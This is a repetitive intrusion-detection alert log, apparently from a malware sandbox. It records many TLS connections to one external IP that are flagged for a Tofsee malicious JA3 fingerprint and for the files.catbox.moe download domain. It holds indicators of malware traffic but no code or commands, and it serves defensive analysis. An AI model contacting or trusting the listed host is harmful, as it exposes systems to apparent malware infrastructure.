TCP 192.168.56.101:49261 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49363 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49363 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49287 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49261 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49317 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49287 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49363 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49317 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49287 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49317 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49278 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49278 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49375 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49375 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49294 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49278 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49294 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49375 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49355 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49319 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49355 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49294 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49319 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49355 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49376 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49319 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49376 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49298 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49376 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49298 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49298 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49358 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49321 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49358 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49321 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49296 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49377 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49358 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49321 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49296 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49377 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49300 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49300 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49296 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49377 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49300 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49326 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49361 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49326 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49361 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49386 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49297 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49326 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49386 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49361 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49304 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49304 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49297 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49386 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49304 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49297 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49330 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49364 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49330 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49364 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49399 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49399 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49330 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49301 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49364 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49301 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49399 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49318 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49318 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49301 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49332 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49318 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49301 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49332 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49402 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49366 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49332 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49402 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49366 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49402 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49366 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49336 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49303 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49336 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49303 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49337 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49337 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49336 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49303 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49406 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49406 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49337 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49406 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49349 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49305 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49349 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49373 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49305 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49348 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49373 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49348 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49349 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49410 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49305 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49410 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49373 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49348 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49410 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49356 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49308 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49356 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49308 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49374 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49350 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49374 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49356 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49350 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49413 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49308 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49413 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49374 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49350 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49413 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49371 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49310 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49371 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49310 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49390 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49351 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49419 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49371 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49351 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49390 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49310 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49419 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49351 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49390 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49419 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49372 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49372 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49314 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49314 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49352 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49424 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49372 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49314 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49424 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49352 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49391 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49391 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49424 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49352 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49391 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49383 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49324 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49383 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49324 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49426 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49426 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49324 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49411 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49365 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49411 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49383 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49426 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49365 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49411 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49365 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49328 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49328 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49385 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49428 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49385 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49328 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49416 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49428 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49382 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49416 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49382 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49385 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49428 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
